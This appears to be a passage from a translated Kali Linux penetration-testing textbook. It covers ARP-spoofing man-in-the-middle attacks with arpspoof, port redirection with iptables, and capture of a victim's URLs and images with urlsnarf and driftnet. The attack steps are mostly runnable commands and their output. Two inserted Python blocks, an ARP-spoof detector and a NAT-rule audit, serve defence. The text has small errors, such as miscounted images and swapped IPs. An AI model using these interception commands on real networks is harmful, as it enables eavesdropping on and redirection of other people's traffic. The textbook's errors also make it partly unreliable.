Arpspoof is a very good open-source program for ARP spoofing. Its operation does not affect communication on the rest of the network; the tool spoofs the target by replacing data in transit. This section describes the use of the Arpspoof tool.
9.8.1 URL traffic manipulation attack
URL traffic manipulation is very similar to a man-in-the-middle attack: it injects traffic routed to the Internet through the target host. The attack is carried out through ARP injection. This section describes the use of the Arpspoof tool to implement a URL traffic manipulation attack. The procedure is as follows:
(1) Turn on the route forwarding function. Run the following command:
# echo 1 >> /proc/sys/net/ipv4/ip_forward
This command produces no output.
(2) Start Arpspoof to inject ARP packets into the target system. The attack is carried out by the attacker (192.168.6.102) sending ARP packets to spoof the gateway (192.168.6.1) and the target system (192.168.6.101). First deceive the target system by executing the following command:
# arpspoof -i eth0 -t 192.168.6.101 192.168.6.1
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
The output shows the packets sent by the attacker to the target host 192.168.6.102. Here 50:e5:49:eb:46:8d is the attacker's MAC address, and 0:19:21:3f:c3:e5 is the MAC address of 192.168.6.101. Once this succeeds, data that the target host 192.168.6.101 sends to the gateway 192.168.6.1 is delivered to the attacker 192.168.6.102.
(3) Use Arpspoof to inject ARP packets into the gateway. Run the following command:
# arpspoof -i eth0 -t 192.168.6.1 192.168.6.101
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d
The above output shows the packets sent by the attacker to the gateway 192.168.6.1. When the attack succeeds, the gateway 192.168.6.1 sends the data destined for the target system 192.168.6.101 to the attacker's host 192.168.6.102.
(4) Once the above steps have succeeded, the attacker effectively controls the data transmitted between the gateway and the target host. By receiving this data, an attacker can view important information from the target system.
To verify the above information, here is a simple example.
[Example 9-7] Verify the Arpspoof attack by capturing packets with Wireshark. The steps are as follows.
(1) Start the Wireshark tool. On the Kali Linux desktop, select Applications | Kali Linux | Top Security Tools | wireshark; the interface shown in Figure 9.49 is displayed.
Figure 9.49 Wireshark start-up interface
(2) Under Start in this interface, select the interface to capture on. Select eth0 here and click the Start button; the interface shown in Figure 9.50 is displayed.
Figure 9.50 Packet capture interface
(3) From this interface you can configure Wireshark and start, stop and refresh the packet capture.
(4) Ping the gateway 192.168.6.1 from the target system 192.168.6.101. Run the following command:
C:\Users\Administrator>ping 192.168.6.1
After the command has run, check the packets Wireshark captured on Kali, as shown in Figure 9.51.
Figure 9.51 Captured packets
(5) This interface shows the data transfer between 192.168.6.101 and 192.168.6.1. The whole exchange spans packets 28-33: packets 28-30 are the request, and packets 31-33 are the target's response. The captured packets are analyzed in detail below.
- 28: 192.168.6.101 (source) sends a ping request to 192.168.6.1 (destination).
- 29: 192.168.6.102 will forward the packet from 192.168.6.101.
- 30: 192.168.6.102 forwards the packet, sending the request on to 192.168.6.1.
- 31: The target host 192.168.6.1 responds to the request from 192.168.6.101.
- 32: The response is sent to 192.168.6.102, at which point that host forwards it to 192.168.6.1.
- 33: Target host 192.168.6.1 sends the forwarded data to 192.168.6.101.
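The spoofed replies in steps (2) and (3) make one MAC address answer for both the gateway and the target, which is what a monitor on the segment can key on. The following detector is an added example, not part of the original text; the first two sample lines (legitimate replies) and the function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample in the "arp reply <ip> is-at <mac>" notation used above:
# lines 1-2 are legitimate replies, lines 3-5 repeat the spoofed ones.
SAMPLE = """\
14:e6:e4:ac:fb:20 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 14:e6:e4:ac:fb:20
0:19:21:3f:c3:e5 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 0:19:21:3f:c3:e5
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
"""
MAC = r"[0-9a-fA-F]{1,2}(?::[0-9a-fA-F]{1,2}){5}"
REPLY = re.compile(r"arp reply (\d+(?:\.\d+){3}) is-at (" + MAC + ")")

def norm_mac(mac):
    """Zero-pad octets so 0:19:21:3f:c3:e5 equals 00:19:21:3f:c3:e5."""
    return ":".join(f"{int(octet, 16):02x}" for octet in mac.split(":"))

def detect(text, pinned=None):
    """Return (line_no, kind, ip, mac) alerts for contradictory ARP replies.
    pinned is an optional {ip: mac} of known-good bindings; without it the
    first binding seen for an IP is trusted (trust on first use)."""
    ip_to_mac = {ip: norm_mac(mac) for ip, mac in (pinned or {}).items()}
    mac_to_ips = defaultdict(set)
    for ip, mac in ip_to_mac.items():
        mac_to_ips[mac].add(ip)
    alerts, seen = [], set()
    for line_no, line in enumerate(text.splitlines(), 1):
        match = REPLY.search(line)
        if not match:
            continue
        ip, mac = match.group(1), norm_mac(match.group(2))
        mac_to_ips[mac].add(ip)
        kinds = []
        if ip_to_mac.setdefault(ip, mac) != mac:
            kinds.append("binding-changed")      # IP answered by a new MAC
        if len(mac_to_ips[mac]) > 1:
            kinds.append("mac-claims-many-ips")  # one NIC answers for several IPs
        for kind in kinds:
            if (kind, ip, mac) not in seen:      # report each finding once
                seen.add((kind, ip, mac))
                alerts.append((line_no, kind, ip, mac))
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

Passing pinned with the gateway's real binding removes the reliance on first-seen bindings. A multihomed host that legitimately answers for several IPs will also raise mac-claims-many-ips and should be allow-listed.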
9.8.2 Port redirection attack
Port redirection is also called port forwarding or port mapping. It is the process of receiving packets on one port (such as port 80) and redirecting that traffic to a different port (such as 8080). The benefits of this type of attack can be endless, because it can redirect secure ports to unencrypted ports and redirect traffic to a specific port on a specified device. This section describes using Arpspoof to implement a port redirection attack. The steps are as follows.
(1) Turn on route forwarding. Run the following command:
# echo 1 >> /proc/sys/net/ipv4/ip_forward
(2) Start the Arpspoof tool to inject traffic into the default network. In this example the default gateway address is 192.168.6.1. Run the following command:
# arpspoof -i eth0 192.168.6.1
After this command is executed on Kali Linux, there is no output. This is a bug in Kali 1.0.6, because the version of the Dsniff package on that system is dsniff-2.4b1+debian-22. When the arpspoof command is run without specifying a target system, it works correctly only with Dsniff package version dsniff-2.4b1+debian-21.1.
(3) Add a firewall rule with port redirection. Run the following command:
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
This command produces no output.
Once this is set up, when a user sends a request to port 80 of the gateway 192.168.6.1, it is redirected to port 8080 and delivered to the attacker's host.
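On a Linux host suspected of relaying other machines' traffic, the combination set up in steps (1) and (3), forwarding enabled plus a PREROUTING rewrite, is visible in the nat table. The following audit is an added example, not from the original text; the sample dump and the function names are constructed, and the dump is assumed to be in iptables-save format.

```python
import shlex

# Constructed iptables-save style dump of the nat table (not from the page).
# The PREROUTING line is the rule from step (3) as it appears once loaded.
SAMPLE_NAT = """\
*nat
:PREROUTING ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 8080
-A OUTPUT -p tcp -m tcp --dport 25 -j REDIRECT --to-ports 2525
COMMIT
"""

def option(tokens, *names):
    """Return the value following the first of the given option names."""
    for name in names:
        if name in tokens[:-1]:
            return tokens[tokens.index(name) + 1]
    return None

def audit_nat(dump, ip_forward):
    """List PREROUTING rules that rewrite where inbound or transit TCP lands.

    dump: text of the nat table; ip_forward: contents of
    /proc/sys/net/ipv4/ip_forward. Both are passed in so this runs offline.
    """
    routing = ip_forward.strip() == "1"
    findings = []
    for line in dump.splitlines():
        tokens = shlex.split(line)
        if tokens[:2] != ["-A", "PREROUTING"]:
            continue  # OUTPUT rules only affect locally generated traffic
        target = option(tokens, "-j", "--jump")
        if target not in ("REDIRECT", "DNAT"):
            continue
        findings.append({
            "target": target,
            "dport": option(tokens, "--dport", "--destination-port"),
            "to": option(tokens, "--to-ports", "--to-port", "--to-destination"),
            # Forwarding on + PREROUTING rewrite = other hosts' traffic is affected.
            "severity": "high" if routing else "review",
        })
    return findings

if __name__ == "__main__":
    for finding in audit_nat(SAMPLE_NAT, "1\n"):
        print(finding)
```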
9.8.3 Capturing and monitoring wireless network data
Using a man-in-the-middle attack, the Kali Linux operating system can be placed between the target host and the router. This allows the user to capture all data from the target host. This section describes the use of the Arpspoof tool to implement a man-in-the-middle attack to capture and monitor wireless network data.
(1) Turn on the route forwarding function. Run the following command:
# echo 1 > /proc/sys/net/ipv4/ip_forward
(2) Use the arpspoof command to attack the host. Run the following command:
# arpspoof -i eth0 -t 192.168.6.106 192.168.6.1
0:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42: arp reply 192.168.6.1 is-at 0:c:29:7a:59:75
0:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42: arp reply 192.168.6.1 is-at 0:c:29:7a:59:75
0:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42: arp reply 192.168.6.1 is-at 0:c:29:7a:59:75
0:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42: arp reply 192.168.6.1 is-at 0:c:29:7a:59:75
0:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42: arp reply 192.168.6.1 is-at 0:c:29:7a:59:75
0:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42: arp reply 192.168.6.1 is-at 0:c:29:7a:59:75
0:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42: arp reply 192.168.6.1 is-at 0:c:29:7a:59:75
0:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42: arp reply 192.168.6.1 is-at 0:c:29:7a:59:75
0:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42: arp reply 192.168.6.1 is-at 0:c:29:7a:59:75
...
Executing the above command tells 192.168.6.106 (the target host) that the gateway's MAC address is 00:0c:29:7a:59:75 (the attack host). When the target host receives the message, it updates the gateway's entry in its ARP cache table. The command does not stop on its own; when the attack is no longer needed, press Ctrl+C to stop it.
(3) View the URLs accessed by the target host. Run the following command:
# urlsnarf -i eth0
urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128]
192.168.6.106 - - [16/Jul/2014:13:12:30 +0800] "GET http://192.168.6.1:1900/igd.xml HTTP/1.1" - - "-" "Microsoft-Windows/6.1 UPnP/1.0"
192.168.6.106 - - [16/Jul/2014:13:12:30 +0800] "GET http://192.168.6.1:1900/l3f.xml HTTP/1.1" - - "-" "Microsoft-Windows/6.1 UPnP/1.0"
192.168.6.106 - - [16/Jul/2014:13:12:30 +0800] "GET http://192.168.6.1:1900/ifc.xml HTTP/1.1" - - "-" "Microsoft-Windows/6.1 UPnP/1.0"
192.168.6.106 - - [16/Jul/2014:13:12:33 +0800] "GET http://192.168.6.1:1900/ipc.xml HTTP/1.1" - - "-" "Microsoft-Windows/6.1 UPnP/1.0"
192.168.6.106 - - [16/Jul/2014:13:12:37 +0800] "GET http://192.168.6.1:1900/igd.xml HTTP/1.1" - - "-" "Microsoft-Windows/6.1 UPnP/1.0"
192.168.6.106 - - [16/Jul/2014:13:12:37 +0800] "POST http://192.168.6.1:1900/IPC HTTP/1.1" - - "-" "Microsoft-Windows/6.1 UPnP/1.0"
192.168.6.106 - - [16/Jul/2014:13:12:37 +0800] "POST http://192.168.6.1:1900/IFC HTTP/1.1" - - "-" "Microsoft-Windows/6.1 UPnP/1.0"
192.168.6.106 - - [16/Jul/2014:13:12:37 +0800] "POST http://192.168.6.1:1900/IPC HTTP/1.1" - - "-" "Microsoft-Windows/6.1 UPnP/1.0"
192.168.6.106 - - [16/Jul/2014:13:12:37 +0800] "POST http://192.168.6.1:1900/IFC HTTP/1.1" - - "-" "Microsoft-Windows/6.1 UPnP/1.0"
The above output shows the target host's Internet access information.
(4) Users can also use the Driftnet tool to capture images viewed by the target system. Run the following command:
# driftnet -i eth0
After executing the above command, a window will open. When a target host accesses a picture in a webpage, it is displayed in that window.
(5) Now access the Internet from the target host to generate traffic to capture. For example, when a Web page is opened in a browser on the target host, the attack host displays the interface shown in Figure 9.52.
Figure 9.52 Pictures accessed by the target host
(6) The interface shows all the images accessed on the target host. The user can click on any picture in Figure 9.52 to save it to the Kali host. The driftnet command then prints the following information:
# driftnet -i eth0
driftnet: saving `/tmp/drifnet-YbOziq/driftnet-53c9d45c168e121f.png' as `driftnet-0.png'
driftnet: saving `/tmp/drifnet-YbOziq/driftnet-53c9d45c168e121f.png' as `driftnet-1.png'
driftnet: saving `/tmp/drifnet-YbOziq/driftnet-53c9d4ca5d888a08.jpeg' as `driftnet-2.jpeg'
driftnet: saving `/tmp/drifnet-YbOziq/driftnet-53c9d4d92a6de806.png' as `driftnet-3.png'
driftnet: saving `/tmp/drifnet-YbOziq/driftnet-53c9d4d92a6de806.png' as `driftnet-4.png'
driftnet: saving `/tmp/drifnet-YbOziq/driftnet-53c9d5351a9a9e69.png' as `driftnet-5.png'
As shown above, the 7 images captured by Driftnet are saved. Their filenames are driftnet-*.png, and the files are saved in the current directory by default.
(7) The user can view them with the image viewer included with Linux, as shown in Figure 9.53.
Figure 9.53 Captured picture
(8) The interface shows the fourth picture. The user can switch between the captured pictures by clicking the Next or Previous button.